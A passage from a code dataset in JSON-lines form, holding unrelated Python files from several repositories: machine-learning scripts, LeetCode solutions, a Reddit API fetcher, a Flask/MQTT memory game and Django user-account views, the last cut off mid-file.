print(\"\\n\")\n\n for idx, i in enumerate(inspect):\n pred = np.argmax([_input[i] for _input in point['reranker_inputs']])\n other_success[idx].append(int(labels[pred] < error_margin))\n\n print(env_name, average(successes))\n for idx in range(len(inspect)):\n print(average(other_success[idx]))\n\nperf_name = '{:.4f}'.format(average(successes))\nsave_path = os.path.join(\n args.cache_path, 'candidates_ranker_{}'.format(perf_name))\nprint('save_path:', save_path)\ntorch.save(net.state_dict(), save_path)\n","repo_name":"volkancirik/FAST","sub_path":"train_reranker.py","file_name":"train_reranker.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70845207932","text":"#!/usr/bin/python3\n\"\"\" A full request with recursion to reddit API\"\"\"\nimport requests\n\n\ndef recurse(subreddit, hot_list=[], after=''):\n \"\"\"recursive with request to the API \"\"\"\n url = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit, after)\n data = {'user-agent': 'scraping_rec-0-0-3'}\n try:\n res = requests.get(url, headers=data,\n allow_redirects=False).json()\n query = res.get('data').get('children')\n after = res.get('data').get('after')\n for child in query:\n data = child.get('data').get('title')\n hot_list.append(data)\n if after is None:\n return(hot_list)\n return(recurse(subreddit, hot_list, after))\n except:\n return(None)\n","repo_name":"cristian0497/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9633658634","text":"import keras\nfrom tensorflow import keras\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os \n# %matplotlib inline\n\nfrom tensorflow import keras\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Input, add\nfrom keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape\nfrom keras.regularizers import l2\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom keras.utils import np_utils\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom 
keras.utils.vis_utils import plot_model\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\nnb_classes = 10\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1)\nX_test = X_test.reshape(X_test.shape[0], 28, 28, 1)\nX_train = X_train.astype(\"float32\")/255.\nX_test = X_test.astype(\"float32\")/255.\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\ny_train = np_utils.to_categorical(y_train, nb_classes)\ny_test = np_utils.to_categorical(y_test, nb_classes)\n\n# print(X_train.shape, 'train samples')\n# print(X_test.shape, 'test samples')\n\ninput_size = 784\nhidden_size = 64\noutput_size = 784\n\nx = Input(shape=(28, 28,1)) \n\n# Encoder\nconv1_1 = Conv2D(16, (3, 3), activation='relu', padding='same')(x)\npool1 = MaxPooling2D((2, 2), padding='same')(conv1_1)\nconv1_2 = Conv2D(8, (3, 3), activation='relu', padding='same')(pool1)\npool2 = MaxPooling2D((2, 2), padding='same')(conv1_2)\nconv1_3 = Conv2D(8, (3, 3), activation='relu', padding='same')(pool2)\nh = MaxPooling2D((2, 2), padding='same')(conv1_3)\n\n\n# Decoder\nconv2_1 = Conv2D(8, (3, 3), activation='relu', padding='same')(h)\nup1 = UpSampling2D((2, 2))(conv2_1)\nconv2_2 = Conv2D(8, (3, 3), activation='relu', padding='same')(up1)\nup2 = UpSampling2D((2, 2))(conv2_2)\nconv2_3 = Conv2D(16, (3, 3), activation='relu')(up2)\nup3 = UpSampling2D((2, 2))(conv2_3)\nr = Conv2D(1, (3, 3), activation='sigmoid', padding='same')(up3)\n\nautoencoder = Model(inputs=x, outputs=r)\nautoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')\n\n# SVG(model_to_dot(autoencoder).create(prog='dot', format='svg'))\nplot_model(autoencoder, to_file='convModel.png')\n\nepochs = 3\nbatch_size = 128\n\nhistory = autoencoder.fit(X_train, X_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(X_test, X_test))\n\nconv_encoder = Model(x, h)\nencoded_imgs = conv_encoder.predict(X_test)\n\nn = 10\nplt.figure(figsize=(20, 8))\nfor i in range(n):\n ax = plt.subplot(1, n, i+1)\n plt.imshow(encoded_imgs[i].reshape(4, 16).T)\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\nplt.show()\n\ndecoded_imgs = autoencoder.predict(X_test)\n\nn = 10\nplt.figure(figsize=(20, 6))\nfor i in range(n):\n # display original\n ax = plt.subplot(3, n, i+1)\n plt.imshow(X_test[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n \n # display reconstruction\n ax = plt.subplot(3, n, i+n+1)\n plt.imshow(decoded_imgs[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n \nplt.show()\n\nprint(history.history.keys())\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper right')\nplt.show()","repo_name":"thidoiSanren/DenoisingAutoencoder","sub_path":"convolutionalAutoencoder.py","file_name":"convolutionalAutoencoder.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42864813109","text":"# 역순 연결 리스트 LEETCODE 206\n# 반복 구조를 이용한 풀이. 
가독성이 좋다.\ndef reverseList(self, head: ListNode) -> ListNode:\n node, prev = head, None\n\n while (node is not None):\n next, node.next = node.next, prev\n prev, node = node, next\n\n return prev","repo_name":"sigridjineth/algorithm_log","sub_path":"leetcode/reverse_linked_list_iterative.py","file_name":"reverse_linked_list_iterative.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"ko","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"21057860050","text":"import numpy as np\nimport pymesh\nimport vtk\nimport glob\nimport os\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\"\"\"\n © Aix Marseille University - LIS-CNRS UMR 7020\n Author(s): Karim Makki, Amine Bohi (karim.makki, amine.bohi{@univ-amu.fr})\n This software is governed by the CeCILL-B license under French law and\n abiding by the rules of distribution of free software. You can use,\n modify and/ or redistribute the software under the terms of the CeCILL-B\n license as circulated by CEA, CNRS and INRIA at the following URL\n \"http://www.cecill.info\".\n As a counterpart to the access to the source code and rights to copy,\n modify and redistribute granted by the license, users are provided only\n with a limited warranty and the software's author, the holder of the\n economic rights, and the successive licensors have only limited\n liability.\n In this respect, the user's attention is drawn to the risks associated\n with loading, using, modifying and/or developing or reproducing the\n software by the user in light of its specific status of free software,\n that may mean that it is complicated to manipulate, and that also\n therefore means that it is reserved for developers and experienced\n professionals having in-depth computer knowledge. 
Users are therefore\n encouraged to load and test the software's suitability as regards their\n requirements in conditions enabling the security of their systems and/or\n data to be ensured and, more generally, to use and operate it in the\n same conditions as regards security.\n The fact that you are presently reading this means that you have had\n knowledge of the CeCILL-B license and that you accept its terms.\n\"\"\"\n\n\ndef initTxt(filename):\n try:\n os.remove(filename)\n except:\n pass\n\ndef save_vertices_as_vtk_file(surface_points, vtk_out):\n\n nbSurfacePts = len(surface_points[:,0])\n logging.info(surface_points)\n logging.info(nbSurfacePts)\n initTxt(vtk_out)\n vtk_file = open(vtk_out, \"a\")\n vtk_file.write(\"# vtk DataFile Version 3.0\\n\")\n vtk_file.write(\"vtk output\\n\")\n vtk_file.write(\"ASCII\\n\")\n vtk_file.write(\"DATASET POLYDATA\\n\")\n vtk_file.write(\"POINTS {} float\\n\".format(nbSurfacePts))\n for c in range(nbSurfacePts):\n vtk_file.write(\"{:.1f} {:.1f} {:.1f}\\n\".format(surface_points[c,0], surface_points[c,1], surface_points[c,2]))\n print(c)\n vtk_file.write(\"VERTICES {} {}\\n\".format(nbSurfacePts, nbSurfacePts*2))\n for c in range(nbSurfacePts):\n vtk_file.write(\"1 {}\\n\".format(c))\n\n\n# The current folder should contain all the quad meshes generated by Instant Meshes\n# This will output a set of vtk files containing the mesh vertices or the point to be tracked\n\nsubjectSet = glob.glob('./*.obj') \n\nsubjectSet.sort()\nprint(subjectSet)\n\nfor subject in range(len(subjectSet)):\n \n \n subject_name = subjectSet[subject].split('/')[-1].split('.')[0]\n \n outfile_name = './'+subject_name+'.vtk'\n\n m = pymesh.load_mesh(subjectSet[subject])\n\n print(m.vertices.shape)\n\n save_vertices_as_vtk_file(m.vertices, outfile_name)\n\n\n\n \n\n","repo_name":"k16makki/dynPelvis","sub_path":"Dynpelvis3D/4D_Quad_Mesh_Reconstruction/vertices_to_vtk.py","file_name":"vertices_to_vtk.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23087561886","text":"#\n# @lc app=leetcode id=57 lang=python3\n#\n# [57] Insert Interval\n#\n\n# @lc code=start\nclass Solution:\n def insert2(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n i = 0\n while i < len(intervals) and newInterval[0] > intervals[i][0]:\n i += 1\n intervals.insert(i, newInterval)\n\n ans = []\n for interval in intervals:\n if not ans or ans[-1][1] < interval[0]:\n ans.append(interval)\n else:\n ans[-1][1] = max(ans[-1][1], interval[1])\n\n return ans\n\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n s, e = newInterval\n # l interval < newInterval\n # r interval > newInterval\n l, r = [], []\n\n for interval in intervals:\n if interval[1] < s:\n l.append(interval)\n elif interval[0] > e:\n r.append(interval)\n else:\n s = min(s, interval[0])\n e = max(e, interval[1])\n return l + [[s, e]] + r\n\n return ans\n\n# @lc code=end\n","repo_name":"haiyizxx/Algo","sub_path":"problem/Array/57.insert-interval.py","file_name":"57.insert-interval.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8455376765","text":"from tensorflow.keras.applications import imagenet_utils\nimport numpy as np\n# Internal libraries/scripts\nfrom aucmedi.data_processing.subfunctions.sf_base import 
Subfunction_Base\n\n#-----------------------------------------------------#\n# Subfunction class: Standardize #\n#-----------------------------------------------------#\nclass Standardize(Subfunction_Base):\n \"\"\" A Standardization method which utilizes custom normalization functions and the Keras\n preprocess_input() functionality in order to normalize intensity value ranges to be\n suitable for neural networks.\n\n Default mode: `\"z-score\"`\n\n Possible modes: `[\"z-score\", \"minmax\", \"grayscale\", \"tf\", \"caffe\", \"torch\"]`\n\n\n ???+ info \"Mode Descriptions\"\n\n | Mode | Description |\n | ------------------- | ------------------------------------------------------------------------- |\n | `\"z-score\"` | Sample-wise Z-score normalization (also called Z-transformation). |\n | `\"minmax\"` | Sample-wise scaling to range [0,1]. |\n | `\"grayscale\"` | Sample-wise scaling to grayscale range [0, 255]. |\n | `\"caffe\"` | Will convert the images from RGB to BGR, then will zero-center each color channel with respect to the ImageNet dataset, without scaling. (RGB encoding required!) |\n | `\"tf\"` | Will scale pixels between -1 and 1, sample-wise. (Grayscale/RGB encoding required!) |\n | `\"torch\"` | Will scale pixels between 0 and 1 and then will normalize each channel with respect to the ImageNet dataset. (RGB encoding required!) |\n\n ??? abstract \"Reference - Implementation\"\n Keras preprocess_input() for `\"tf\", \"caffe\", \"torch\"`\n\n https://www.tensorflow.org/api_docs/python/tf/keras/applications/imagenet_utils/preprocess_input\n \"\"\"\n #---------------------------------------------#\n # Initialization #\n #---------------------------------------------#\n def __init__(self, mode=\"z-score\", smooth=0.000001):\n \"\"\" Initialization function for creating a Standardize Subfunction which can be passed to a\n [DataGenerator][aucmedi.data_processing.data_generator.DataGenerator].\n\n Args:\n mode (str): Selected mode which standardization/normalization technique should be applied.\n smooth (float): Smoothing factor to avoid zero devisions (epsilon).\n \"\"\"\n # Verify mode existence\n if mode not in [\"z-score\", \"minmax\", \"grayscale\", \"tf\", \"caffe\", \"torch\"]:\n raise ValueError(\"Subfunction - Standardize: Unknown modus\", mode)\n # Cache class variables\n self.mode = mode\n self.e = smooth\n\n #---------------------------------------------#\n # Transformation #\n #---------------------------------------------#\n def transform(self, image):\n # Perform z-score normalization\n if self.mode == \"z-score\":\n # Compute mean and standard deviation\n mean = np.mean(image)\n std = np.std(image)\n # Scaling\n image_norm = (image - mean + self.e) / (std + self.e)\n # Perform MinMax normalization between [0,1]\n elif self.mode == \"minmax\":\n # Identify minimum and maximum\n max_value = np.max(image)\n min_value = np.min(image)\n # Scaling\n image_norm = (image - min_value + self.e) / \\\n (max_value - min_value + self.e)\n elif self.mode == \"grayscale\":\n # Identify minimum and maximum\n max_value = np.max(image)\n min_value = np.min(image)\n # Scaling\n image_scaled = (image - min_value + self.e) / \\\n (max_value - min_value + self.e)\n image_norm = np.around(image_scaled * 255, decimals=0)\n else:\n # Verify if image is in [0,255] format\n if np.min(image) < 0 or np.max(image) > 255:\n raise ValueError(\"Subfunction Standardize: Image values are not in range [0,255]!\",\n \"Provided min/max values for image are:\", np.min(image), np.max(image),\n \"Ensure 
that all images are normalized to [0,255] before using the following modes:\",\n \"['tf', 'caffe', 'torch']\")\n # Perform architecture standardization\n image_norm = imagenet_utils.preprocess_input(image, mode=self.mode)\n # Return standardized image\n return image_norm\n","repo_name":"frankkramer-lab/aucmedi","sub_path":"aucmedi/data_processing/subfunctions/standardize.py","file_name":"standardize.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"78"} +{"seq_id":"17781025722","text":"import unittest\nimport pandas as pd\n\n\n# check the basic / default attributes\nclass TestCilaAttributes(unittest.TestCase):\n\n def test_cilia_attributes(self):\n from mmpb.attributes.cilia_attributes import measure_cilia_attributes\n\n input_path = '../../data/0.5.1/segmentations/sbem-6dpf-1-whole-segmented-cilia-labels.h5'\n input_key = 't00000/s00/0/cells'\n resolution = [0.025, 0.01, 0.01]\n base_path = '../../data/0.5.1/tables/sbem-6dpf-1-whole-segmented-cilia-labels/default.csv'\n base = pd.read_csv(base_path, sep='\\t')\n\n out, _ = measure_cilia_attributes(input_path, input_key, base, resolution)\n self.assertEqual(len(out), len(base))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mobie/platybrowser-project","sub_path":"test/attributes/test_cilia.py","file_name":"test_cilia.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"3295060989","text":"import asyncio\nimport json\nfrom threading import Thread\n\nimport websockets\n\nwebsocket_address = \"wss://stream.bybit.com/realtime\"\nlast_price = None\n\n\ndef start():\n # Starts a new thread to listen for Bybit price action\n Thread(target=initialize).start()\n\n\ndef initialize():\n # Sets thread settings\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(listen())\n\n\nasync def listen():\n # Listens for price action and sets the last price to 'last_price'\n global last_price\n async with websockets.connect(websocket_address) as w:\n await w.send('{\"op\":\"subscribe\",\"args\":[\"instrument.BTCUSD\"]}')\n while True:\n result = await w.recv()\n result = json.loads(result)\n try:\n last_price = result[\"data\"][0][\"last_price\"]\n last_price = float(last_price)\n except:\n pass\n\n\ndef get_last_price():\n # Returns 'last_price'\n return last_price\n","repo_name":"jamespeccia/BybitBot","sub_path":"websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"19476444082","text":"import random\nimport time\nfrom flask import Flask, request\nfrom flask_mqtt import Mqtt\nfrom flask_socketio import SocketIO\n\n# GLOBAL VARIABLES\ngame = \"none\"\nbussy = False\ncounter = 0 # for memory\nsequence_number = 1 # for memory\nsequence = [] # for memory\nwon = [2,2,2,2] # for memory \nlose = [0,0,0,0]\n\n# MQQT CLIENT \napp = Flask(__name__)\napp.config['SECRET'] = 'my secret key' \napp.config['MQTT_BROKER_URL'] = '127.0.0.1'\napp.config['MQTT_BROKER_PORT'] = 1883\napp.config['MQTT_REFRESH_TIME'] = 1.0 # refresh time in seconds\nmqtt = Mqtt(app)\n\n# Send simple message\ndef send_demo():\n sequence = [0,1,2,3]\n for item in sequence:\n mqtt.publish(str(item), \"1\")\n print(f\"Sending: {item}\")\n time.sleep(2)\n mqtt.loop(timeout=1.0)\n mqtt.publish(str(item), \"off\")\n 
print(f\"Sending: off\")\n\n\n\n@mqtt.on_message()\ndef handle_mqtt_message(client, userdata, message):\n global game\n # print topic and message\n topic = message.topic\n message = message.payload.decode(\"utf-8\")\n print(f\"Topic: {topic}, Message: {message}\")\n if topic == \"games\":\n if message == \"memory\":\n game = \"memory\"\n print(\"starting memory\")\n send_demo()\n elif message == \"redblue\":\n game = \"redblue\"\n print(\"redblue\")\n elif message == \"zen\":\n game = \"zen\"\n print(\"zen\")\n elif message == \"minesweepr\":\n game = \"minesweepr\"\n print(\"minesweepr\")\n if topic == \"buttons\":\n if game == \"memory\":\n if bussy == False:\n check_sequence(message)\n elif game == \"redblue\":\n # Do read button stuff voor redblue\n print(\"red vs blue button incomming\")\n elif game == \"zen\":\n # Do read button stuff voor zen\n print(\"zen button incomming\")\n elif game == \"minesweepr\":\n # Do read button stuff voor minesweepr\n print(\"minesweeper button incomming\")\n\n@mqtt.on_connect()\ndef handle_connect(client, userdata, flags, rc):\n print(\"Connected with result code \" + str(rc))\n mqtt.subscribe(\"buttons\")\n mqtt.subscribe(\"games\")\n\n\n# GAMES\ndef generate_sequence(sequence_number):\n leds = [0, 1, 2 , 3]\n global sequence\n # Generate sequence\n for i in range(sequence_number):\n led = leds[random.randint(0, len(leds)-1)]\n sequence.append(led)\n return sequence\n\ndef send_sequence(sequence, blink = False):\n global bussy\n if(blink == True):\n for item in sequence:\n # Publish message\n mqtt.publish(str(item), \"1\")\n print(f\"Sending: {item}\")\n # Wait 2 seconds before sending next message mqqt flask\n time.sleep(2)\n print(\"Sending: off\")\n mqtt.publish(str(item), \"off\")\n else:\n mqtt.publish(str(0), str(sequence[0]))\n mqtt.publish(str(1), str(sequence[1]))\n mqtt.publish(str(2), str(sequence[2]))\n mqtt.publish(str(3), str(sequence[3]))\n time.sleep(1)\n for i in range(0,5):\n mqtt.publish(str(i), \"off\")\n\n bussy = False\n\ndef check_sequence(received_sequence):\n # Global variables\n global sequence_number\n global sequence\n global counter\n global won\n global lose\n\n print(int(received_sequence) == sequence[counter])\n # check if the received sequence matches the current sequence\n if int(received_sequence) == sequence[counter]:\n counter += 1\n # check if the entire sequence has been matched\n if counter == len(sequence): \n # Resent counter en sequence \n counter = 0\n sequence = []\n # You have won\n print(f\"You have won! your points: {sequence_number}\")\n mqtt.publish(\"memorypoints\", str(sequence_number))\n send_sequence(won, False)\n # Start new game en higher sequence \n sequence_number += 1\n # Start new game\n start_memory()\n else:\n print(\"Sequence does not match. 
Game over.\")\n counter = 0\n send_sequence(lose, False)\n send_sequence(sequence=sequence, blink=True)\n\ndef start_memory():\n # Global variables\n global bussy \n global sequence_number\n # Start game\n bussy = True\n sequence = generate_sequence(sequence_number)\n send_sequence(sequence=sequence, blink=True)\n\n# Flask route\n@app.route('/')\ndef index():\n send_demo()\n return \"Hello World\"\n\n\n# APP START\nif __name__ == '__main__':\n app.run(debug=False, host='0.0.0.0')\n\n","repo_name":"Bart-Roels/teamproject-groep5","sub_path":"Testing_Memorygame/appflask.py","file_name":"appflask.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9807273925","text":"import matplotlib\nimport seaborn\n\nfrom . import hig\n\n\ndef set(style=None) -> None:\n \"\"\"\n Set style.\n\n Parameters\n ----------\n - style : dict, None, or one of {darkgrid, whitegrid, dark, white, ticks}\n A dictionary of parameters or the name of a preconfigured set.\n \"\"\"\n style = seaborn.axes_style(style)\n\n style[\"axes.edgecolor\"] = hig.GRAY\n style[\"axes.linewidth\"] = 1.6\n style[\"axes.prop_cycle\"] = hig.cycle\n style[\"figure.dpi\"] = 300\n style[\"grid.color\"] = hig.GRAY\n style[\"legend.edgecolor\"] = hig.GRAY\n style[\"savefig.bbox\"] = \"tight\"\n style[\"savefig.pad_inches\"] = 0.1\n\n matplotlib.rcParams.update(style)\n","repo_name":"simaki/mpl-hig","sub_path":"mpl_hig/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"25350575559","text":"import rpi\nimport torch.nn as nn\nimport torch\n\n\nc0 = nn.Conv2d(3, 3, 3, 1, padding=1)\nc1 = nn.Conv2d(3, 5, 5, 1, padding=2)\nc2 = nn.Conv2d(5, 2, 3, 1, padding=1)\n\nc1_ = nn.Conv2d(3, 5, 3, 1, padding=1)\n\nlin = nn.Linear(3*32*2*32, 4)\nlast = nn.Softmax()\n\nm = nn.ModuleList([c0, c1, c2, lin, last])\n\nra = rpi.rolling_arc(m)\n\nx = torch.randn(1,3,32,32)\n\no1 = ra(x)\n\nra.replace_conv_n_with(1, c1_)\n\no2 = ra(x)\n\n","repo_name":"TreeLimes/QANAS","sub_path":"prac.py","file_name":"prac.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21554641114","text":"import requests\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import status, permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom config.settings.base import SECRETS\nfrom members.models import *\nfrom members.serializers import *\n\nUser = get_user_model()\n\n\n# superuser 제외\ndef get_queryset_not_superuser(self, request):\n if request.user.gender == '여자':\n partner_gender = '남자'\n else:\n partner_gender = '여자'\n return User.objects.filter(is_superuser=False).filter(gender=partner_gender)\n\n\n# 해당 유저의 이메일 정보로 상세프로필 정보 불러오기\nclass UserThroughEmailAPIView(APIView):\n # superuser만 read/write 할 수 있도록 설정 필요!\n permission_classes = [permissions.IsAdminUser, ]\n\n def post(self, request):\n user = User.objects.get(email=request.data['email'])\n data = {\n 'userProfile': UserProfileSerializer(user).data,\n }\n return Response(data)\n\n\n# 회원가입 (토큰 생성)\nclass 
CreateUserAPIView(APIView):\n permission_classes = [permissions.AllowAny, ]\n\n def post(self, request):\n serializer = UserCreateSerializer(data=request.data)\n\n if serializer.is_valid():\n user = serializer.save()\n # 계정 생성 시 리본 기본 지급 (맞는지 모르겠음.. 일단 보류)\n UserRibbon.objects.create(user=user, paid_ribbon=0, current_ribbon=50)\n token = Token.objects.create(user=user)\n\n data = {\n 'token': token.key,\n 'user': UserAccountSerializer(user).data,\n }\n return Response(data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AuthTokenAPIView(APIView):\n # 내 생각엔 GET은 IsAuthenticated 여야함\n permission_classes = [permissions.AllowAny, ]\n\n # (가입된) 유저 리스트\n def get(self, request):\n users = User.objects.all()\n login = []\n logout = []\n on_screening = []\n fail = []\n superusers = []\n\n for user in users:\n # 테스트를 위해 임의 6명 관리자 생성\n if user.is_superuser:\n superusers.append(user.email)\n # 가입심사 중인 상태 (가입심사한 이성 1~2명인 상태)\n elif user.status() == 'on_screening':\n on_screening.append(user)\n # 가입심사 불합격 (가입심사한 이성 3명 이상인 상태)\n elif user.status() == 'fail':\n fail.append(user)\n # 가입심사 합격 (가입심사한 이성 3명 이상인 상태)\n else:\n try:\n # 합격한 유저중 로그인 상태\n login.append(user.auth_token.user)\n except:\n # 합격한 유저중 로그아웃 상태\n logout.append(user)\n\n data = {\n 'superusers': superusers,\n 'login': UserAccountSerializer(login, many=True).data,\n 'logout': UserAccountSerializer(logout, many=True).data,\n 'onScreening': UserAccountSerializer(on_screening, many=True).data,\n 'fail': UserAccountSerializer(fail, many=True).data,\n }\n return Response(data)\n\n # 로그인(토큰 가져오거나 생성)\n def post(self, request):\n email = request.data['email']\n password = request.data['password']\n user = authenticate(email=email, password=password)\n\n # 유저 인증되고, 가입심사 합격한 유저의 경우\n if user and user.status() == 'pass':\n if not len(user.userribbon_set.all()):\n UserRibbon.objects.create(user=user, paid_ribbon=10, current_ribbon=10)\n token, _ = Token.objects.get_or_create(user=user)\n else:\n raise AuthenticationFailed('유저 인증에 성공하지 못하였거나, 가입심사를 합격한 유저가 아닙니다.')\n\n data = {\n 'token': token.key,\n 'user': UserAccountSerializer(user).data\n }\n return Response(data)\n\n\n# 계정 탈퇴\nclass UserDeleteAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n user.delete()\n return Response('탈퇴가 완료되었습니다.')\n else:\n raise AuthenticationFailed('유저 인증에 성공하지 못하였습니다.')\n\n\n# 로그아웃 (토큰 삭제)\nclass LogoutUserAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n token = Token.objects.get(user=request.user)\n\n if not token:\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n token.delete()\n return Response('로그아웃 되었습니다.')\n\n\n# 유저의 상세프로필 전체 정보 가져오기\nclass UserProfileAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if Token.objects.filter(user=request.user):\n data = {\n 'userProfile': UserProfileSerializer(request.user).data,\n }\n return Response(data)\n # 로그아웃된 유저도 정보 볼 수 있도록 해야하는지 확인필요\n return Response('인증 토큰이 없는 유저입니다. 
로그인이 되어있습니까?')\n\n\nclass UserImageAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # user 프로필 이미지 갖고오기\n def get(self, request):\n images = UserImage.objects.filter(user=request.user)\n serializer = UserImageSerializer(images, many=True)\n\n data = {\n 'images': serializer.data,\n }\n return JsonResponse(data, safe=False)\n\n # user 프로필 이미지 추가하기\n # 계정 생성 시 꼭 3개 추가해야 함\n def post(self, request):\n images = request.data.getlist('images')\n\n arr = []\n for image in images:\n data = {\n 'image': image,\n }\n serializer = UserImageSerializer(data=data)\n\n if serializer.is_valid():\n serializer.save(user=request.user)\n arr.append(serializer.data)\n else:\n return Response(serializer.errors)\n\n data = {\n 'images': arr,\n }\n return Response(data, status=status.HTTP_201_CREATED)\n\n # user 프로필 이미지 삭제하기\n def delete(self, request, pk):\n images = UserImage.objects.filter(user=request.user)\n if len(images) <= 3:\n return Response('최소 3장 이상 업로드돼있어야 합니다.')\n\n image = UserImage.objects.filter(user=request.user, pk=pk)\n if image:\n image.delete()\n return Response('해당 이미지가 삭제되었습니다.')\n return Response('해당 이미지의 pk가 존재하지 않습니다.')\n\n\nclass UserInfoAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저의 상세프로필 정보 가져오기\n def get(self, request):\n info = UserInfo.objects.get(user=request.user)\n\n # 아래 response는 뜨면 안되는 response임..\n # 계정 생성 직후 바로 프로필 정보를 등록해야 함\n if not info:\n return Response('등록된 프로필 정보가 없습니다.')\n\n data = {\n 'info': UserInfoSerializer(info).data,\n }\n return Response(data)\n\n # (회원가입 직후 첫) 상세프로필 작성 (처음 생성 시 딱 한번 사용)\n def post(self, request):\n info = UserInfo.objects.get(user=request.user)\n\n # 이미 등록된 프로필 정보가 있으면 안됨..\n # 계정 생성 직후 첫 프로필정보 등록하는 곳\n if info or request.user.status() == 'pass':\n return Response('이미 등록된 프로필 정보가 있습니다.')\n\n serializer = UserInfoSerializer(data=request.data)\n\n if serializer.is_valid():\n info = serializer.save(user=request.user)\n\n data = {\n 'info': UserInfoSerializer(info).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n # 상세프로필 수정\n def patch(self, request):\n info = UserInfo.objects.get(user=request.user)\n\n if not info or request.user.status() != 'pass':\n return Response('등록된 프로필 정보가 없거나 가입심사를 합격한 유저가 아닙니다.')\n\n serializer = UserInfoSerializer(info, data=request.data, partial=True)\n\n if serializer.is_valid():\n info = serializer.save()\n\n data = {\n 'info': UserInfoSerializer(info).data\n }\n return Response(data)\n return Response(serializer.errors)\n\n\nclass UserStoryAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저의 스토리 불러오기\n def get(self, request):\n stories = Story.objects.filter(user=request.user)\n\n if not stories:\n return Response('등록된 스토리가 없습니다.')\n\n serializer = UserStorySerializer(stories, many=True)\n\n data = {\n 'stories': serializer.data,\n }\n return Response(data)\n\n # 해당 유저의 스토리 추가\n def post(self, request):\n serializer = UserStorySerializer(data=request.data)\n user_stories = request.user.story_set.all()\n user_story_numbers = set()\n # 현재 유저가 등록한 스토리 번호 불러와 저장\n for user_story in user_stories:\n user_story_numbers.add(user_story.story)\n\n # POST 요청한 스토리 번호가 이미 등록된 스토리일 경우, response 메시지\n if str(request.data['story']) in user_story_numbers:\n return Response('이미 등록되어있는 스토리 입니다.')\n\n if serializer.is_valid():\n story = serializer.save(user=request.user)\n\n data = {\n 'story': UserStorySerializer(story).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n # 현재 유저의 
